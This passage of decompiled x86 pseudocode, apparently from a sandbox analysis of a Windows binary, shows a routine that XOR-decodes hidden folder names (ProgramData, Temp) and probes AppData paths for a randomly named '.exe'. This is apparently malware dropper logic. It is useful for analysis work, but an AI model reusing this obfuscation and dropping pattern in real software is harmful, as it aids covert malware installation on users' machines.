														_t1434 = E00402980(_t1309, _t1434, _t1683, _t1688, 4, _v400, ".exe", 4);
													} else {
														 *(_t1434 + 0x10) = _t1582 + 4;
														_t1011 = _t1434;
														__eflags = _t1683 - 0x10;
														if(_t1683 >= 0x10) {
															_t1011 =  *_t1434;
														}
														 *((intOrPtr*)(_t1011 + _t1582)) = 0x6578652e;
														 *((char*)(_t1011 + _t1582 + 4)) = 0;
													}
													 *_t1688 = 0;
													 *(_t1688 + 0x10) = 0;
													 *(_t1688 + 0x14) = 0;
													asm("movups xmm0, [ecx]");
													asm("movups [esi], xmm0");
													asm("movq xmm0, [ecx+0x10]");
													asm("movq [esi+0x10], xmm0");
													 *(_t1434 + 0x10) = 0;
													 *(_t1434 + 0x14) = 0xf;
													 *_t1434 = 0;
													_t1583 = _v456;
													__eflags = _t1583 - 0x10;
													if(_t1583 < 0x10) {
														L262:
														_t1584 = _v408;
														_v460 = 0;
														_v456 = 0xf;
														_v476 = 0;
														__eflags = _t1584 - 0x10;
														if(_t1584 < 0x10) {
															L266:
															_t1585 = _v352;
															_v412 = 0;
															_v408 = 0xf;
															_v428 = 0;
															__eflags = _t1585 - 0x10;
															if(_t1585 < 0x10) {
																L270:
																_t1586 = _v328;
																_v356 = 0;
																_v352 = 0xf;
																_v372 = 0;
																__eflags = _t1586 - 0x10;
																if(__eflags < 0) {
																	goto L228;
																} else {
																	_t1436 = _v348;
																	_t1587 = _t1586 + 1;
																	_t994 = _t1436;
																	__eflags = _t1587 - 0x1000;
																	if(__eflags < 0) {
																		L273:
																		_push(_t1587);
																		E0040EDFF(_t1436);
																		_t1716 = _t1716 + 8;
																		_v332 = 0;
																		_v328 = 0xf;
																		_v348 = 0;
																		goto L39;
																	} else {
																		_t1360 =  *((intOrPtr*)(_t1436 - 4));
																		_t1557 = _t1587 + 0x23;
																		__eflags = _t994 -  *((intOrPtr*)(_t1436 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L273;
																		}
																	}
																}
															} else {
																_t1437 = _v372;
																_t1588 = _t1585 + 1;
																_t998 = _t1437;
																__eflags = _t1588 - 0x1000;
																if(_t1588 < 0x1000) {
																	L269:
																	_push(_t1588);
																	E0040EDFF(_t1437);
																	_t1716 = _t1716 + 8;
																	goto L270;
																} else {
																	_t1360 =  *((intOrPtr*)(_t1437 - 4));
																	_t1557 = _t1588 + 0x23;
																	__eflags = _t998 -  *((intOrPtr*)(_t1437 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L269;
																	}
																}
															}
														} else {
															_t1438 = _v428;
															_t1589 = _t1584 + 1;
															_t1002 = _t1438;
															__eflags = _t1589 - 0x1000;
															if(_t1589 < 0x1000) {
																L265:
																_push(_t1589);
																E0040EDFF(_t1438);
																_t1716 = _t1716 + 8;
																goto L266;
															} else {
																_t1360 =  *((intOrPtr*)(_t1438 - 4));
																_t1557 = _t1589 + 0x23;
																__eflags = _t1002 -  *((intOrPtr*)(_t1438 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L265;
																}
															}
														}
													} else {
														_t1439 = _v476;
														_t1590 = _t1583 + 1;
														_t1006 = _t1439;
														__eflags = _t1590 - 0x1000;
														if(_t1590 < 0x1000) {
															L261:
															_push(_t1590);
															E0040EDFF(_t1439);
															_t1716 = _t1716 + 8;
															goto L262;
														} else {
															_t1360 =  *((intOrPtr*)(_t1439 - 4));
															_t1557 = _t1590 + 0x23;
															__eflags = _t1006 -  *((intOrPtr*)(_t1439 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L261;
															}
														}
													}
												}
											} else {
												_t1440 = _v452;
												_t1551 = _t1551 + 1;
												_t1012 = _t1440;
												__eflags = _t1551 - 0x1000;
												if(_t1551 < 0x1000) {
													L251:
													_push(_t1551);
													E0040EDFF(_t1440);
													_t1712 = _t1712 + 8;
													goto L252;
												} else {
													_t1360 =  *((intOrPtr*)(_t1440 - 4));
													_t1557 = _t1551 + 0x23;
													__eflags = _t1012 -  *((intOrPtr*)(_t1440 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L313;
													} else {
														goto L251;
													}
												}
											}
										} else {
											_t1441 = _v428;
											_t1591 = _t1550 + 1;
											_t1016 = _t1441;
											__eflags = _t1591 - 0x1000;
											if(_t1591 < 0x1000) {
												L247:
												_push(_t1591);
												E0040EDFF(_t1441);
												_t1712 = _t1712 + 8;
												goto L248;
											} else {
												_t1360 =  *((intOrPtr*)(_t1441 - 4));
												_t1557 = _t1591 + 0x23;
												__eflags = _t1016 -  *((intOrPtr*)(_t1441 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L313;
												} else {
													goto L247;
												}
											}
										}
									} else {
										_t1442 = _v476;
										_t1592 = _t1549 + 1;
										_t1020 = _t1442;
										__eflags = _t1592 - 0x1000;
										if(_t1592 < 0x1000) {
											L243:
											_push(_t1592);
											E0040EDFF(_t1442);
											_t1712 = _t1712 + 8;
											goto L244;
										} else {
											_t1360 =  *((intOrPtr*)(_t1442 - 4));
											_t1557 = _t1592 + 0x23;
											__eflags = _t1020 -  *((intOrPtr*)(_t1442 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L313;
											} else {
												goto L243;
											}
										}
									}
								} else {
									_push(_t1326);
									_t1034 = E0040C770( &_v428,  &_v396);
									_v16 = 0x1b;
									_t1035 = E0040C990( &_v476, _t1034,  &_v372);
									_t1716 = _t1711 + 8;
									_t1446 = _t1035;
									_v16 = 0x1c;
									_t1683 =  *(_t1446 + 0x14);
									_t1595 =  *(_t1446 + 0x10);
									__eflags = _t1683 - _t1595 - 4;
									if(_t1683 - _t1595 < 4) {
										_v400 = 0;
										_t1446 = E00402980(_t1309, _t1446, _t1683, _t1688, 4, _v400, ".exe", 4);
									} else {
										 *(_t1446 + 0x10) = _t1595 + 4;
										_t1056 = _t1446;
										__eflags = _t1683 - 0x10;
										if(_t1683 >= 0x10) {
											_t1056 =  *_t1446;
										}
										 *((intOrPtr*)(_t1056 + _t1595)) = 0x6578652e;
										 *((char*)(_t1056 + _t1595 + 4)) = 0;
									}
									 *_t1688 = 0;
									 *(_t1688 + 0x10) = 0;
									 *(_t1688 + 0x14) = 0;
									asm("movups xmm0, [ecx]");
									asm("movups [esi], xmm0");
									asm("movq xmm0, [ecx+0x10]");
									asm("movq [esi+0x10], xmm0");
									 *(_t1446 + 0x10) = 0;
									 *(_t1446 + 0x14) = 0xf;
									 *_t1446 = 0;
									_t1596 = _v456;
									__eflags = _t1596 - 0x10;
									if(_t1596 < 0x10) {
										L216:
										_t1597 = _v408;
										_v460 = 0;
										_v456 = 0xf;
										_v476 = 0;
										__eflags = _t1597 - 0x10;
										if(_t1597 < 0x10) {
											L220:
											_t1598 = _v352;
											_v412 = 0;
											_v408 = 0xf;
											_v428 = 0;
											__eflags = _t1598 - 0x10;
											if(_t1598 < 0x10) {
												L224:
												_t1599 = _v328;
												_v356 = 0;
												_v352 = 0xf;
												_v372 = 0;
												__eflags = _t1599 - 0x10;
												if(__eflags < 0) {
													L228:
													_v332 = 0;
													_v328 = 0xf;
													_v348 = 0;
													goto L39;
												} else {
													_t1447 = _v348;
													_t1600 = _t1599 + 1;
													_t1039 = _t1447;
													__eflags = _t1600 - 0x1000;
													if(__eflags < 0) {
														L227:
														_push(_t1600);
														E0040EDFF(_t1447);
														_t1716 = _t1716 + 8;
														goto L228;
													} else {
														_t1360 =  *((intOrPtr*)(_t1447 - 4));
														_t1557 = _t1600 + 0x23;
														__eflags = _t1039 -  *((intOrPtr*)(_t1447 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L227;
														}
													}
												}
											} else {
												_t1448 = _v372;
												_t1601 = _t1598 + 1;
												_t1043 = _t1448;
												__eflags = _t1601 - 0x1000;
												if(_t1601 < 0x1000) {
													L223:
													_push(_t1601);
													E0040EDFF(_t1448);
													_t1716 = _t1716 + 8;
													goto L224;
												} else {
													_t1360 =  *((intOrPtr*)(_t1448 - 4));
													_t1557 = _t1601 + 0x23;
													__eflags = _t1043 -  *((intOrPtr*)(_t1448 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L313;
													} else {
														goto L223;
													}
												}
											}
										} else {
											_t1449 = _v428;
											_t1602 = _t1597 + 1;
											_t1047 = _t1449;
											__eflags = _t1602 - 0x1000;
											if(_t1602 < 0x1000) {
												L219:
												_push(_t1602);
												E0040EDFF(_t1449);
												_t1716 = _t1716 + 8;
												goto L220;
											} else {
												_t1360 =  *((intOrPtr*)(_t1449 - 4));
												_t1557 = _t1602 + 0x23;
												__eflags = _t1047 -  *((intOrPtr*)(_t1449 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L313;
												} else {
													goto L219;
												}
											}
										}
									} else {
										_t1450 = _v476;
										_t1603 = _t1596 + 1;
										_t1051 = _t1450;
										__eflags = _t1603 - 0x1000;
										if(_t1603 < 0x1000) {
											L215:
											_push(_t1603);
											E0040EDFF(_t1450);
											_t1716 = _t1716 + 8;
											goto L216;
										} else {
											_t1360 =  *((intOrPtr*)(_t1450 - 4));
											_t1557 = _t1603 + 0x23;
											__eflags = _t1051 -  *((intOrPtr*)(_t1450 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L313;
											} else {
												goto L215;
											}
										}
									}
								}
							} else {
								_t1451 = _v452;
								_t1545 = _t1545 + 1;
								_t1057 = _t1451;
								__eflags = _t1545 - 0x1000;
								if(_t1545 < 0x1000) {
									L205:
									_push(_t1545);
									E0040EDFF(_t1451);
									_t1708 = _t1708 + 8;
									goto L206;
								} else {
									_t1360 =  *((intOrPtr*)(_t1451 - 4));
									_t1557 = _t1545 + 0x23;
									__eflags = _t1057 -  *((intOrPtr*)(_t1451 - 4)) + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										goto L313;
									} else {
										goto L205;
									}
								}
							}
						} else {
							_t1452 = _v428;
							_t1604 = _t1544 + 1;
							_t1061 = _t1452;
							__eflags = _t1604 - 0x1000;
							if(_t1604 < 0x1000) {
								L201:
								_push(_t1604);
								E0040EDFF(_t1452);
								_t1708 = _t1708 + 8;
								goto L202;
							} else {
								_t1360 =  *((intOrPtr*)(_t1452 - 4));
								_t1557 = _t1604 + 0x23;
								__eflags = _t1061 -  *((intOrPtr*)(_t1452 - 4)) + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L313;
								} else {
									goto L201;
								}
							}
						}
					} else {
						_t1453 = _v476;
						_t1605 = _t1543 + 1;
						_t1065 = _t1453;
						__eflags = _t1605 - 0x1000;
						if(_t1605 < 0x1000) {
							L197:
							_push(_t1605);
							E0040EDFF(_t1453);
							_t1708 = _t1708 + 8;
							goto L198;
						} else {
							_t1360 =  *((intOrPtr*)(_t1453 - 4));
							_t1557 = _t1605 + 0x23;
							__eflags = _t1065 -  *((intOrPtr*)(_t1453 - 4)) + 0xfffffffc - 0x1f;
							if(__eflags > 0) {
								goto L313;
							} else {
								goto L197;
							}
						}
					}
				} else {
					_t1077 =  &_v300;
					__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t1077); // executed
					if(_t1077 < 0) {
						_t1606 = E00418B65(_t1309, __edi, _t1688, __eflags, "APPDATA");
						_t1707 = _t1707 + 4;
						_t1454 = _t1606;
						_t16 = _t1454 + 1; // 0x1
						_t1683 = _t16;
						goto L6;
						L6:
						_t1079 =  *_t1454;
						_t1454 = _t1454 + 1;
						__eflags = _t1079;
						if(_t1079 != 0) {
							goto L6;
						} else {
							_t1455 = _t1454 - _t1683;
							__eflags = _t1455;
							_push(_t1455);
							_push(_t1606);
						}
					} else {
						_t1536 =  &_v300;
						_t1681 = _t1536 + 1;
						asm("o16 nop [eax+eax]");
						goto L3;
						L3:
						_t1306 =  *_t1536;
						_t1536 = _t1536 + 1;
						_t1769 = _t1306;
						if(_t1306 != 0) {
							goto L3;
						} else {
							_push(_t1536 - _t1681);
							_push( &_v300);
						}
					}
					E004026B0(_t1309,  &_v396);
					E00406760(_t1309,  &_v372, _t1683); // executed
					_v16 = 1;
					_t1082 = E00417DF6( &_v372, _t1769);
					asm("cdq");
					_t1459 =  &_v348;
					E004055C0(_t1459, _t1082 % 0xa + 5);
					_push(_t1459);
					_v16 = 2;
					_t1085 = E0040C770( &_v476,  &_v396);
					_v16 = 3;
					_t1086 = E0040C990( &_v428, _t1085,  &_v372);
					_t1716 = _t1707 + 8;
					E00402490(_t1309,  &_v396, _t1086);
					_t1611 = _v408;
					if(_t1611 < 0x10) {
						L12:
						_v16 = 2;
						_t1612 = _v456;
						_v412 = 0;
						_v408 = 0xf;
						_v428 = 0;
						if(_t1612 < 0x10) {
							L16:
							_t1747 = _t1716 - 0x18;
							_v400 = _t1747;
							E0040BB90(_t1309, _t1747, _t1612, _t1683,  &_v348);
							_t1748 = _t1747 - 0x18;
							_v16 = 4;
							_t1465 = _t1748;
							E0040BB90(_t1309, _t1465, _t1612, _t1683,  &_v396);
							_v16 = 2;
							_t1092 = E00406800(_t1309, _t1465, _t1683, _t1688); // executed
							_t1749 = _t1748 + 0x30;
							if(_t1092 == 0) {
								_v401 = 0x2e;
								_t1683 =  *( *[fs:0x2c]);
								_t1094 =  *0x450f0c; // 0x0
								__eflags = _t1094 -  *((intOrPtr*)(_t1683 + 4));
								if(_t1094 >  *((intOrPtr*)(_t1683 + 4))) {
									E0040EF48(_t1094, 0x450f0c);
									_t1749 = _t1749 + 4;
									__eflags =  *0x450f0c - 0xffffffff;
									if(__eflags == 0) {
										asm("movaps xmm0, [0x439d90]");
										asm("movups [0x450ed4], xmm0");
										 *0x450ee4 = _v401;
										E0040F25B(_t1465, __eflags, 0x42d070);
										E0040EEFE(0x450f0c);
										_t1749 = _t1749 + 8;
									}
								}
								_t1095 =  *0x450ee4; // 0x0
								__eflags = _t1095;
								if(_t1095 != 0) {
									asm("movups xmm0, [0x450ed4]");
									asm("movaps xmm1, [0x439d30]");
									asm("pxor xmm1, xmm0");
									 *0x450ee4 = _t1095 ^ 0x0000002e;
									asm("movups [0x450ed4], xmm1");
								}
								_t1466 = 0x450ed4;
								_v324 = 0;
								_v308 = 0;
								_v304 = 0xf;
								_v324 = 0;
								_t100 = _t1466 + 1; // 0x450ed5
								_t1613 = _t100;
								asm("o16 nop [eax+eax]");
								do {
									_t1096 =  *_t1466;
									_t1466 = _t1466 + 1;
									__eflags = _t1096;
								} while (_t1096 != 0);
								E004026B0(_t1309,  &_v324, 0x450ed4, _t1466 - _t1613);
								_v16 = 7;
								_t1614 = _v304;
								_t1469 = _v308;
								__eflags = _t1614 - _t1469 - 1;
								if(_t1614 - _t1469 < 1) {
									_v400 = 0;
									_t1100 = E00402980(_t1309,  &_v324, _t1683, _t1688, 1, _v400, "\\", 1);
								} else {
									_t105 =  &(1[_t1469]); // 0x1
									__eflags = _t1614 - 0x10;
									_v308 = _t105;
									_t1269 =  >=  ? _v324 :  &_v324;
									 *((short*)(( >=  ? _v324 :  &_v324) + _t1469)) = 0x5c;
									_t1100 =  &_v324;
								}
								_v452 = 0;
								_v436 = 0;
								_v432 = 0;
								asm("movups xmm0, [eax]");
								asm("movups [ebp-0x1b8], xmm0");
								asm("movq xmm0, [eax+0x10]");
								asm("movq [ebp-0x1a8], xmm0");
								 *(_t1100 + 0x10) = 0;
								 *(_t1100 + 0x14) = 0xf;
								 *_t1100 = 0;
								_v16 = 8;
								_t1102 = E0040C990( &_v428,  &_v452,  &_v372);
								_t1716 = _t1749 + 4;
								E00402490(_t1309,  &_v396, _t1102);
								_t1616 = _v408;
								__eflags = _t1616 - 0x10;
								if(_t1616 < 0x10) {
									L57:
									_v16 = 7;
									_t1617 = _v432;
									_v412 = 0;
									_v408 = 0xf;
									_v428 = 0;
									__eflags = _t1617 - 0x10;
									if(_t1617 < 0x10) {
										L61:
										_v16 = 2;
										_t1618 = _v304;
										_v436 = 0;
										_v432 = 0xf;
										_v452 = 0;
										__eflags = _t1618 - 0x10;
										if(_t1618 < 0x10) {
											L65:
											_t1750 = _t1716 - 0x18;
											_v304 = _t1750;
											E0040BB90(_t1309, _t1750, _t1618, _t1683,  &_v348);
											_t1751 = _t1750 - 0x18;
											_v16 = 9;
											_t1474 = _t1751;
											E0040BB90(_t1309, _t1474, _t1618, _t1683,  &_v396);
											_v16 = 2;
											_t1108 = E00406800(_t1309, _t1474, _t1683, _t1688);
											_t1752 = _t1751 + 0x30;
											__eflags = _t1108;
											if(_t1108 == 0) {
												_t1109 =  *0x450ebc; // 0x0
												_v316 = 0x7e72146d;
												_v312 = 0x5c49415c;
												_v308 = 0x4f6a434f;
												_v304 = 0x4f5a;
												_v401 = 0x2e;
												__eflags = _t1109 -  *((intOrPtr*)(_t1683 + 4));
												if(_t1109 >  *((intOrPtr*)(_t1683 + 4))) {
													E0040EF48(_t1109, 0x450ebc);
													_t1752 = _t1752 + 4;
													__eflags =  *0x450ebc - 0xffffffff;
													if(__eflags == 0) {
														asm("movq xmm0, [ebp-0x130]");
														 *0x451020 = _v308;
														 *0x451024 = _v304;
														asm("movq [0x451018], xmm0");
														 *0x451026 = _v401;
														E0040F25B(_t1474, __eflags, 0x42d040);
														E0040EEFE(0x450ebc);
														_t1752 = _t1752 + 8;
													}
												}
												__eflags =  *0x451026;
												if( *0x451026 != 0) {
													_t1226 = 0;
													__eflags = 0;
													do {
														 *(_t1226 + 0x451018) =  *(_t1226 + 0x451018) ^ 0x0000002e;
														_t1226 = _t1226 + 1;
														__eflags = _t1226 - 0xf;
													} while (_t1226 < 0xf);
												}
												_t1475 = 0x451018;
												_v452 = 0;
												_v436 = 0;
												_v432 = 0xf;
												_v452 = 0;
												_t201 = _t1475 + 1; // 0x451019
												_t1619 = _t201;
												do {
													_t1110 =  *_t1475;
													_t1475 = _t1475 + 1;
													__eflags = _t1110;
												} while (_t1110 != 0);
												E004026B0(_t1309,  &_v452, 0x451018, _t1475 - _t1619);
												_v16 = 0xc;
												_t1620 = _v432;
												_t1478 = _v436;
												__eflags = _t1620 - _t1478 - 1;
												if(_t1620 - _t1478 < 1) {
													_v400 = 0;
													_t1114 = E00402980(_t1309,  &_v452, _t1683, _t1688, 1, _v400, "\\", 1);
												} else {
													_t206 =  &(1[_t1478]); // 0x1
													__eflags = _t1620 - 0x10;
													_v436 = _t206;
													_t1225 =  >=  ? _v452 :  &_v452;
													 *((short*)(( >=  ? _v452 :  &_v452) + _t1478)) = 0x5c;
													_t1114 =  &_v452;
												}
												_v428 = 0;
												_v412 = 0;
												_v408 = 0;
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x1a0], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x190], xmm0");
												 *(_t1114 + 0x10) = 0;
												 *(_t1114 + 0x14) = 0xf;
												 *_t1114 = 0;
												_v16 = 0xd;
												_t1116 = E0040C990( &_v476,  &_v428,  &_v372);
												_t1716 = _t1752 + 4;
												E00402490(_t1309,  &_v396, _t1116);
												_t1622 = _v456;
												__eflags = _t1622 - 0x10;
												if(_t1622 < 0x10) {
													L102:
													_v16 = 0xc;
													_t1623 = _v408;
													_v460 = 0;
													_v456 = 0xf;
													_v476 = 0;
													__eflags = _t1623 - 0x10;
													if(_t1623 < 0x10) {
														L106:
														_v16 = 2;
														_t1624 = _v432;
														_v412 = 0;
														_v408 = 0xf;
														_v428 = 0;
														__eflags = _t1624 - 0x10;
														if(_t1624 < 0x10) {
															L110:
															_t1753 = _t1716 - 0x18;
															_v304 = _t1753;
															E0040BB90(_t1309, _t1753, _t1624, _t1683,  &_v348);
															_t1754 = _t1753 - 0x18;
															_v16 = 0xe;
															_t1483 = _t1754;
															E0040BB90(_t1309, _t1483, _t1624, _t1683,  &_v396);
															_v16 = 2;
															_t1122 = E00406800(_t1309, _t1483, _t1683, _t1688);
															_t1755 = _t1754 + 0x30;
															__eflags = _t1122;
															if(_t1122 == 0) {
																_t1123 =  *0x450f20; // 0x0
																_v308 = 0x7a72146d;
																_v304 = 0x2e5e434b;
																__eflags = _t1123 -  *((intOrPtr*)(_t1683 + 4));
																if(_t1123 >  *((intOrPtr*)(_t1683 + 4))) {
																	E0040EF48(_t1123, 0x450f20);
																	_t1755 = _t1755 + 4;
																	__eflags =  *0x450f20 - 0xffffffff;
																	if(__eflags == 0) {
																		 *0x450f58 = _v308;
																		 *0x450f5c = _v304;
																		E0040F25B(_v304, __eflags, 0x42d030);
																		E0040EEFE(0x450f20);
																		_t1755 = _t1755 + 8;
																	}
																}
																_t1124 =  *0x450f5f; // 0x0
																__eflags = _t1124;
																if(_t1124 != 0) {
																	 *0x450f58 =  *0x450f58 ^ 0x0000002e;
																	 *0x450f59 =  *0x450f59 ^ 0x0000002e;
																	 *0x450f5a =  *0x450f5a ^ 0x0000002e;
																	 *0x450f5b =  *0x450f5b ^ 0x0000002e;
																	 *0x450f5c =  *0x450f5c ^ 0x0000002e;
																	 *0x450f5d =  *0x450f5d ^ 0x0000002e;
																	 *0x450f5e =  *0x450f5e ^ 0x0000002e;
																	_t1184 = _t1124 ^ 0x0000002e;
																	__eflags = _t1184;
																	 *0x450f5f = _t1184;
																}
																_t1484 = 0x450f58;
																_v452 = 0;
																_v436 = 0;
																_v432 = 0xf;
																_v452 = 0;
																_t296 =  &(_t1484[1]); // 0x450f59
																_t1625 = _t296;
																do {
																	_t1125 =  *_t1484;
																	_t1484 =  &(_t1484[1]);
																	__eflags = _t1125;
																} while (_t1125 != 0);
																E004026B0(_t1309,  &_v452, 0x450f58, _t1484 - _t1625);
																_v16 = 0x11;
																_t1626 = _v432;
																_t1487 = _v436;
																__eflags = _t1626 - _t1487 - 1;
																if(_t1626 - _t1487 < 1) {
																	_v400 = 0;
																	_t1129 = E00402980(_t1309,  &_v452, _t1683, _t1688, 1, _v400, "\\", 1);
																} else {
																	_t301 =  &(1[_t1487]); // 0x1
																	__eflags = _t1626 - 0x10;
																	_v436 = _t301;
																	_t1183 =  >=  ? _v452 :  &_v452;
																	 *((short*)(( >=  ? _v452 :  &_v452) + _t1487)) = 0x5c;
																	_t1129 =  &_v452;
																}
																_v428 = 0;
																_v412 = 0;
																_v408 = 0;
																asm("movups xmm0, [eax]");
																asm("movups [ebp-0x1a0], xmm0");
																asm("movq xmm0, [eax+0x10]");
																asm("movq [ebp-0x190], xmm0");
																 *(_t1129 + 0x10) = 0;
																 *(_t1129 + 0x14) = 0xf;
																 *_t1129 = 0;
																_v16 = 0x12;
																_t1131 = E0040C990( &_v476,  &_v428,  &_v372);
																_t1716 = _t1755 + 4;
																E00402490(_t1309,  &_v396, _t1131);
																_t1628 = _v456;
																__eflags = _t1628 - 0x10;
																if(_t1628 < 0x10) {
																	L146:
																	_v16 = 0x11;
																	_t1629 = _v408;
																	_v460 = 0;
																	_v456 = 0xf;
																	_v476 = 0;
																	__eflags = _t1629 - 0x10;
																	if(_t1629 < 0x10) {
																		L150:
																		_v16 = 2;
																		_t1630 = _v432;
																		_v412 = 0;
																		_v408 = 0xf;
																		_v428 = 0;
																		__eflags = _t1630 - 0x10;
																		if(_t1630 < 0x10) {
																			L154:
																			_t1756 = _t1716 - 0x18;
																			_v304 = _t1756;
																			E0040BB90(_t1309, _t1756, _t1630, _t1683,  &_v348);
																			_t1757 = _t1756 - 0x18;
																			_v16 = 0x13;
																			_t1492 = _t1757;
																			E0040BB90(_t1309, _t1492, _t1630, _t1683,  &_v396);
																			_v16 = 2;
																			_t1137 = E00406800(_t1309, _t1492, _t1683, _t1688);
																			_t1716 = _t1757 + 0x30;
																			__eflags = _t1137;
																			if(_t1137 == 0) {
																				_v16 = 1;
																				_t1631 = _v328;
																				__eflags = _t1631 - 0x10;
																				if(_t1631 < 0x10) {
																					L180:
																					_v16 = 0;
																					_t1557 = _v352;
																					_v332 = 0;
																					_v328 = 0xf;
																					_v348 = 0;
																					__eflags = _t1557 - 0x10;
																					if(_t1557 < 0x10) {
																						L309:
																						E00402510(_t1688, 0x4399f7);
																						L310:
																						E00402440(_t1309,  &_v396);
																						goto L311;
																					} else {
																						_t1493 = _v372;
																						_t1557 =  &(1[_t1557]);
																						_t1138 = _t1493;
																						__eflags = _t1557 - 0x1000;
																						if(_t1557 < 0x1000) {
																							L183:
																							_push(_t1557);
																							E0040EDFF(_t1493);
																							goto L309;
																						} else {
																							_t1360 =  *((intOrPtr*)(_t1493 - 4));
																							_t1557 = _t1557 + 0x23;
																							__eflags = _t1138 -  *((intOrPtr*)(_t1493 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L313;
																							} else {
																								goto L183;
																							}
																						}
																					}
																				} else {
																					_t1494 = _v348;
																					_t1632 = _t1631 + 1;
																					_t1142 = _t1494;
																					__eflags = _t1632 - 0x1000;
																					if(_t1632 < 0x1000) {
																						L179:
																						_push(_t1632);
																						E0040EDFF(_t1494);
																						_t1716 = _t1716 + 8;
																						goto L180;
																					} else {
																						_t1360 =  *((intOrPtr*)(_t1494 - 4));
																						_t1557 = _t1632 + 0x23;
																						__eflags = _t1142 -  *((intOrPtr*)(_t1494 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L313;
																						} else {
																							goto L179;
																						}
																					}
																				}
																			} else {
																				_push(_t1492);
																				_t1146 = E0040C770( &_v428,  &_v396);
																				_v16 = 0x14;
																				_t1147 = E0040C990( &_v476, _t1146,  &_v348);
																				_t1716 = _t1716 + 8;
																				_t1498 = _t1147;
																				_v16 = 0x15;
																				_t1683 =  *(_t1498 + 0x14);
																				_t1635 =  *(_t1498 + 0x10);
																				__eflags = _t1683 - _t1635 - 4;
																				if(_t1683 - _t1635 < 4) {
																					_v400 = 0;
																					_t1498 = E00402980(_t1309, _t1498, _t1683, _t1688, 4, _v400, ".exe", 4);
																				} else {
																					 *(_t1498 + 0x10) = _t1635 + 4;
																					_t1168 = _t1498;
																					__eflags = _t1683 - 0x10;
																					if(_t1683 >= 0x10) {
																						_t1168 =  *_t1498;
																					}
																					 *((intOrPtr*)(_t1168 + _t1635)) = 0x6578652e;
																					 *((char*)(_t1168 + _t1635 + 4)) = 0;
																				}
																				 *_t1688 = 0;
																				 *(_t1688 + 0x10) = 0;
																				 *(_t1688 + 0x14) = 0;
																				asm("movups xmm0, [ecx]");
																				asm("movups [esi], xmm0");
																				asm("movq xmm0, [ecx+0x10]");
																				asm("movq [esi+0x10], xmm0");
																				 *(_t1498 + 0x10) = 0;
																				 *(_t1498 + 0x14) = 0xf;
																				 *_t1498 = 0;
																				_t1636 = _v456;
																				__eflags = _t1636 - 0x10;
																				if(_t1636 < 0x10) {
																					L164:
																					_t1637 = _v408;
																					_v460 = 0;
																					_v456 = 0xf;
																					_v476 = 0;
																					__eflags = _t1637 - 0x10;
																					if(_t1637 < 0x10) {
																						L168:
																						_t1638 = _v328;
																						_v412 = 0;
																						_v408 = 0xf;
																						_v428 = 0;
																						__eflags = _t1638 - 0x10;
																						if(_t1638 < 0x10) {
																							L172:
																							_t1639 = _v352;
																							_v332 = 0;
																							_v328 = 0xf;
																							_v348 = 0;
																							__eflags = _t1639 - 0x10;
																							if(__eflags < 0) {
																								goto L38;
																							} else {
																								_t1499 = _v372;
																								_t1640 = _t1639 + 1;
																								_t1151 = _t1499;
																								__eflags = _t1640 - 0x1000;
																								if(__eflags < 0) {
																									goto L37;
																								} else {
																									_t1360 =  *((intOrPtr*)(_t1499 - 4));
																									_t1557 = _t1640 + 0x23;
																									__eflags = _t1151 -  *((intOrPtr*)(_t1499 - 4)) + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L313;
																									} else {
																										goto L37;
																									}
																								}
																							}
																						} else {
																							_t1500 = _v348;
																							_t1641 = _t1638 + 1;
																							_t1155 = _t1500;
																							__eflags = _t1641 - 0x1000;
																							if(_t1641 < 0x1000) {
																								L171:
																								_push(_t1641);
																								E0040EDFF(_t1500);
																								_t1716 = _t1716 + 8;
																								goto L172;
																							} else {
																								_t1360 =  *((intOrPtr*)(_t1500 - 4));
																								_t1557 = _t1641 + 0x23;
																								__eflags = _t1155 -  *((intOrPtr*)(_t1500 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L313;
																								} else {
																									goto L171;
																								}
																							}
																						}
																					} else {
																						_t1501 = _v428;
																						_t1642 = _t1637 + 1;
																						_t1159 = _t1501;
																						__eflags = _t1642 - 0x1000;
																						if(_t1642 < 0x1000) {
																							L167:
																							_push(_t1642);
																							E0040EDFF(_t1501);
																							_t1716 = _t1716 + 8;
																							goto L168;
																						} else {
																							_t1360 =  *((intOrPtr*)(_t1501 - 4));
																							_t1557 = _t1642 + 0x23;
																							__eflags = _t1159 -  *((intOrPtr*)(_t1501 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L313;
																							} else {
																								goto L167;
																							}
																						}
																					}
																				} else {
																					_t1502 = _v476;
																					_t1643 = _t1636 + 1;
																					_t1163 = _t1502;
																					__eflags = _t1643 - 0x1000;
																					if(_t1643 < 0x1000) {
																						L163:
																						_push(_t1643);
																						E0040EDFF(_t1502);
																						_t1716 = _t1716 + 8;
																						goto L164;
																					} else {
																						_t1360 =  *((intOrPtr*)(_t1502 - 4));
																						_t1557 = _t1643 + 0x23;
																						__eflags = _t1163 -  *((intOrPtr*)(_t1502 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L313;
																						} else {
																							goto L163;
																						}
																					}
																				}
																			}
																		} else {
																			_t1503 = _v452;
																			_t1630 = _t1630 + 1;
																			_t1169 = _t1503;
